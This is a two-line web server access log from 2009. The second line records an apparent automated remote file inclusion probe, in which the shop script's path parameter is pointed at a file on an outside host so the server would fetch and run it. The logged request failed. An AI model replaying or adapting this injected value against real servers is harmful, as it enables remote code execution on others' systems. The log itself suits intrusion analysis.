212.33.197.126 - - [25/May/2009:02:57:15 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L000B214C6021830066DD05P+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
70.38.31.50 - - [25/May/2009:02:58:54 -0400] "GET /logs/error_log.Q109050900//shop/main.php?_shop_path=http://feiwu-au.tw/appserv/AUTHORS.txt%0D?? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
